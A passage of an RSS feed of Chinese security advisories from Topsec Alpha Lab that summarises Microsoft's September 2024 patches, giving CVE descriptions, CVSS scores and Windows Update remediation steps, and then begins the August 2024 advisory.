14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38247、CVE-2024-38249：Windows图形组件本地权限提升漏洞</span></span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38247是Windows图形组件中的双重释放漏洞（CWE-415）。CVE-2024-38249是Windows图形组件中的释放后重用UAF漏洞（CWE-416）。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">经过普通用户身份认证的本地攻击者通过运行特制的程序来利用这些漏洞。成功利用这些漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43457：Windows设置和部署本地权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43457是Windows设置和部署中的未经引用的搜索路径或元素漏洞（CWE-428）。经过普通用户身份认证的本地攻击者通过运行特制的程序来利用此漏洞。成功利用此漏洞的攻击者可以获得目标系统的SYSTEM权限。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span><span style="font-size: var(--articleFontsize);letter-spacing: 0.034em;text-align: justify;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43461：Windows MSHTML平台欺骗漏洞</span></span></span></span></span><br/></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43461是Windows MSHTML平台中的关键信息的UI错误表达漏洞（CWE-451）。远程攻击者可以诱骗受害者访问特制的网站，执行欺骗攻击并可能危及受影响的系统。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;">CVE-2024-43487：Windows网络标记(MOTW)安全功能绕过漏洞</span></span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-43487是Windows网络标记(MOTW)安全功能中的保护机制失效漏洞（CWE-693）。未经身份认证的远程攻击者通过在其控制的服务器上托管一个文件，然后诱使目标用户下载并打开该文件来利用此漏洞。成功利用此漏洞能够绕过Windows网络标记(MOTW)安全功能。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="width: 577.422px;letter-spacing: 0.578px;white-space: normal;list-style-type: square;"><li style="font-weight: bold;"><section style="margin-bottom: 8px;line-height: 1.6em;text-align: left;text-indent: 0em;"><strong><span style="letter-spacing: 0.476px;text-decoration-style: solid;text-decoration-color: rgba(0, 0, 0, 0.9);font-size: 16px;">高评分漏洞</span></strong></section></li></ul><table><tbody><tr><td width="123" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE</span><br/></td><td width="314" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">漏洞名称</span><br/></td><td width="70" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVSS3.1</span><br/></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-38220</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Azure Stack Hub权限提升漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">9.0/7.8</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-26186</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Microsoft SQL Server Native Scoring远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.8/7.7</span></td></tr><tr><td width="143" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">CVE-2024-21416</span></td><td width="334" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">Windows TCP/IP远程代码执行漏洞</span></td><td width="88" valign="top" style="word-break: break-all;"><span style="font-size: 14px;">8.1/7.1</span></td></tr></tbody></table><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38220：Azure Stack Hub权限提升漏洞</span></span></span><br/></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-38220是Azure Stack Hub中的访问控制不当漏洞（CWE-284）。经过普通用户身份认证的远程攻击者必须等待受害者发起连接才能利用此漏洞。成功利用此漏洞的攻击者可以未经授权访问系统资源，并可能允许他们以与受感染进程相同的权限执行操作。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><p style="margin-top: 0px;margin-bottom: 8px;text-align: left;"><span style="text-align: justify;font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.034em;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26186：Microsoft SQL Server Native Scoring远程代码执行漏洞</span></span></span></span></span><br/></span></span></p></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-26186是Microsoft SQL Server Native Scoring中的释放后重用UAF漏洞（CWE-416）。成功利用此漏洞需要经过身份验证的攻击者利用SQL Server Native Scoring将预先训练的模型应用于他们的数据，而无需将其移出数据库。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">本月更新中还发布了很多此组件的漏洞，请到MSRC官网查看更多漏洞的详细信息。</span></section><ul class="list-paddingleft-1" style="list-style-type: disc;"><li><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);">CVE-2024-21416：Windows TCP/IP远程代码执行漏洞</span></span></section></li></ul><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;">CVE-2024-21416是Windows TCP/IP中的堆溢出漏洞（CWE-122）。未经身份认证的远程攻击者通过向配置了NetNAT服务的Windows计算机发送特制请求来利用此漏洞。该服务不是默认配置。此外，必须存在特定的网络条件才能成功利用该漏洞。</span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="line-height: 1.6em;text-align: left;margin: 0px 0px 8px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.476px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><section style="margin-bottom: 0px;text-indent: 0em;white-space: normal;line-height: 25.5px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x02 影响版本</span></strong></section><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><section style="text-indent: 0em;white-space: normal;line-height: 25.5px;text-align: left;margin-top: 16px;margin-bottom: 8px;"><span style="font-size: 14px;letter-spacing: 0.578px;text-indent: 0em;">影响多个主流版本的Windows，多个主流版本的Microsoft系列软件。</span></section><section style="margin-bottom: 0px;margin-top: 24px;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.54px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x03 修复建议</span></strong><br/></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><ul class="list-paddingleft-1" style="list-style-type: square;"><li style="font-weight: bold;"><p style="white-space: normal;margin-top: 16px;margin-bottom: 16px;"><strong><span style="font-size: 16px;">Windows自动更新</span></strong></p></li></ul><section style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">Windows系统默认启用Microsoft Update，当检测到可用更新时，将会自动下载更新并在下一次启动时安装。还可通过以下步骤快速安装更新：</span></section><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">1、点击“开始菜单”或按Windows快捷键，点击进入“设置”。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">2、选择“更新和安全”，进入“Windows更新”（Windows Server 2012以及Windows Server 2012 R2可通过控制面板进入“Windows更新”，步骤为“控制面板”-&gt;“系统和安全”-&gt;“Windows更新”）。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">3、选择“检查更新”，等待系统将自动检查并下载可用更新。</span></p><p style="letter-spacing: 0.578px;text-indent: 0em;white-space: normal;margin-top: 0px;margin-bottom: 0px;"><span style="font-size: 14px;">4、重启计算机，安装更新系统重新启动后，可通过进入“Windows更新”-&gt;“查看更新历史记录”查看是否成功安装了更新。对于没有成功安装的更新，可以点击该更新名称进入微软官方更新描述链接，点击最新的SSU名称并在新链接中点击“Microsoft 更新目录”，然后在新链接中选择适用于目标系统的补丁进行下载并安装。</span></p><ul class="list-paddingleft-1" style="list-style-type: square;"><li><p style="margin-top: 16px;margin-bottom: 16px;letter-spacing: 0.578px;white-space: normal;"><strong><span style="font-size: 16px;">手动安装补丁</span></strong><strong><span style="font-size: 14px;"></span></strong><span style="font-size: 14px;"><br/></span></p></li></ul><section style="letter-spacing: 0.578px;white-space: normal;margin-top: 0px;margin-bottom: 8px;"><span style="font-size: 14px;">另外，对于不能自动更新的系统版本，可参考以下链接下载适用于该系统的9月补丁并安装：</span><span style="font-size: 14px;letter-spacing: 0.578px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none;"><a href="https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep" target="_blank">https://msrc.microsoft.com/update-guide/releaseNote/2024-Sep</a></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="letter-spacing: 0.578px;text-decoration: none;font-size: 14px;"></span></section><section style="line-height: 1.6em;text-align: justify;margin: 0px 0px 24px;text-indent: 0em;"><span style="font-size: 14px;letter-spacing: 0.578px;text-decoration: none solid rgba(0, 0, 0, 0.9);"></span></section><h2 style="white-space: normal;color: rgb(62, 62, 62);line-height: 24px;letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;max-width: 100%;break-after: auto;background-color: rgb(255, 255, 255);margin-top: 24px;box-sizing: border-box !important;"><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x04 声明</span></strong><strong style="max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"></strong></h2><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;max-width: 100%;background-color: rgb(255, 255, 255);box-sizing: border-box !important;"/><p style="white-space: normal;text-align: left;line-height: 25.5px;text-indent: 32px;margin-bottom: 0px;"><br/></p><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;">天融信阿尔法实验室拥有对此公告的修改和解释权，如欲转载，必须保证此公告的完整性。由于传播、利用此公告而造成的任何后果，均由使用者本人负责，天融信阿尔法实验室不为此承担任何责任。<br/></p><section style="white-space: normal;margin-bottom: 0px;"><section style="margin: 30px 0% 10px;"><section style="display: inline-block;width: 100%;vertical-align: top;border-style: dashed;border-width: 2px;border-radius: 11px;border-color: rgb(141, 186, 190);padding: 10px;background-color: rgba(244, 242, 240, 0.6);"><section><section style="color: rgb(115, 120, 121);"><p><span style="font-size: 14px;">天融信阿尔法实验室成立于2011年，一直以来，阿尔法实验室秉承“攻防一体”的理念，汇聚众多专业技术研究人员，从事攻防技术研究，在安全领域前瞻性技术研究方向上不断前行。作为天融信的安全产品和服务支撑团队，阿尔法实验室精湛的专业技术水平、丰富的排异经验，为天融信产品的研发和升级、承担国家重大安全项目和客户服务提供强有力的技术支撑。</span><br/></p></section></section></section></section></section><section style="margin-bottom: 0px;"><section powered-by="xiumi.us"><section style="text-align: center;margin: 30px 0% 10px;"><section style="display: inline-block;width: 95%;vertical-align: top;box-shadow: rgb(185, 185, 185) 1.41421px 1.41421px 6px;padding: 5px;"><section powered-by="xiumi.us"><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><br/></p></section><section style="margin: -20px 0% 5px;"><p style="vertical-align: middle;display: inline-block;box-shadow: rgb(0, 0, 0) 0px 0px 0px;"><img class="rich_pages wxw-img" data-ratio="0.06041666666666667" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="png" data-w="480" src="https://wechat2rss.xlab.app/img-proxy/?k=5ba09fbc&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJakNxM37lzr8eRJRibEfxkwBibg9KpVh6nibXHoG4xC6KyGFtTd4TOe6GyA%2F640%3Fwx_fmt%3Dpng"/></p></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;vertical-align: middle;width: 38%;box-shadow: rgb(0, 0, 0) 0px 0px 0px;padding-left: 10px;"><section powered-by="xiumi.us"><section style="margin-top: 10px;margin-bottom: 10px;"><section style="vertical-align: middle;display: inline-block;"><img class="rich_pages wxw-img" data-ratio="1" style="vertical-align: middle;width:auto !important;max-width:100% !important;height:auto !important;" data-type="jpeg" data-w="344" src="https://wechat2rss.xlab.app/img-proxy/?k=33f7228b&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_jpg%2FH6W1QCHf9dGfIEDOlNXXDTqOpRkEkicJawf8nKyKatopPJiaayibAUCvfTVFKfxVDInq2TiaUib6xhmhpLK4Zqscgyg%2F640%3Fwx_fmt%3Djpeg"/></section></section></section></section><section style="display: inline-block;vertical-align: middle;width: 61.8%;"><section powered-by="xiumi.us"><section><section style="font-size: 14px;"><p><span style="font-family:Optima-Regular, PingFangTC-light;">天融信</span></p><p><span style="font-family:Optima-Regular, PingFangTC-light;">阿尔法实验室</span></p></section></section></section><section powered-by="xiumi.us"><section style="margin: 10px 0%;"><section style="display: inline-block;box-shadow: rgb(183, 28, 28) 0px 0px 0px inset;border-style: solid;border-width: 1px;border-radius: 5px;border-color: rgb(66, 66, 66);padding: 5px;background-color: rgb(252, 228, 236);"><section powered-by="xiumi.us"><section style="text-align: left;color: rgb(131, 129, 129);padding-right: 8px;padding-left: 8px;font-size: 14px;"><p><span style="font-family: Optima-Regular, PingFangTC-light;">长按二维码关注我们</span></p></section></section></section></section></section></section></section></section></section></section></section></section><p style="color: rgb(53, 53, 53);font-family: &#34;Helvetica Neue&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei&#34;, 黑体, Arial, sans-serif;font-size: 14px;text-align: left;white-space: normal;background-color: rgb(255, 255, 255);margin-bottom: 0px;"><br/></p><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>



<p><a href="2247496658">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=576cc631&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzg3MDAzMDQxNw%3D%3D%26mid%3D2247496658%26idx%3D1%26sn%3D02005282a824b73cb47aac5119d935e7%26subscene%3D0">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Wed, 11 Sep 2024 15:57:00 +0800</pubDate>
    </item>
    <item>
      <title>【风险提示】天融信关于微软2024年8月安全更新的风险提示</title>
      <link>https://mp.weixin.qq.com/s?__biz=Mzg3MDAzMDQxNw==&amp;mid=2247496656&amp;idx=1&amp;sn=629d69cf53bcf827e6076a1ce898aa41</link>
      <description>2024年8月14日，天融信阿尔法实验室监测到微软官方发布了8月安全更新。此次更新共修复90个漏洞（不包含3个外部分配漏洞和本月早些时候发布的9个Edge漏洞），其中7个严重漏洞、80个重要漏洞、3个中危漏洞。</description>
      <content:encoded><![CDATA[<p>
原创 <span>天融信应急响应</span> <span>2024-08-14 15:31</span> <span style="display: inline-block;">北京</span>
</p>

<p>2024年8月14日，天融信阿尔法实验室监测到微软官方发布了8月安全更新。此次更新共修复90个漏洞（不包含3个外部分配漏洞和本月早些时候发布的9个Edge漏洞），其中7个严重漏洞、80个重要漏洞、3个中危漏洞。</p>
<p></p>



<p>
<img src="https://wechat2rss.xlab.app/img-proxy/?k=b9f6448d&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABcSkgTrIxBsgHiaHKWYIddeKgQ7v38EL68obnaSRJjpxDrSOAf34MkIA%2F0%3Fwx_fmt%3Djpeg"/>
</p>


<p style="text-align: center;"><img class="rich_pages wxw-img js_insertlocalimg" data-ratio="0.29259259259259257" data-s="300,640" style="" data-type="png" data-w="1080" src="https://wechat2rss.xlab.app/img-proxy/?k=a7b7e105&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2FH6W1QCHf9dFAuWicxwmIw9QNBSyN6GrABpjDae9Wfv6vs4Tg5bETzto4ibjJCEjTWJm0R7fx5lNS9nlpbHtD3Ziag%2F640%3Fwx_fmt%3Dpng"/></p><p style="margin-bottom: 0px;white-space: normal;"><strong style="color: rgb(62, 62, 62);font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 16px;letter-spacing: 0.544px;max-width: 100%;box-sizing: border-box !important;overflow-wrap: break-word !important;"><span style="max-width: 100%;font-size: 24px;line-height: 36px;box-sizing: border-box !important;overflow-wrap: break-word !important;">0x00 背景介绍</span></strong><br/></p><hr style="white-space: normal;color: rgb(62, 62, 62);letter-spacing: 0.54px;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;font-size: 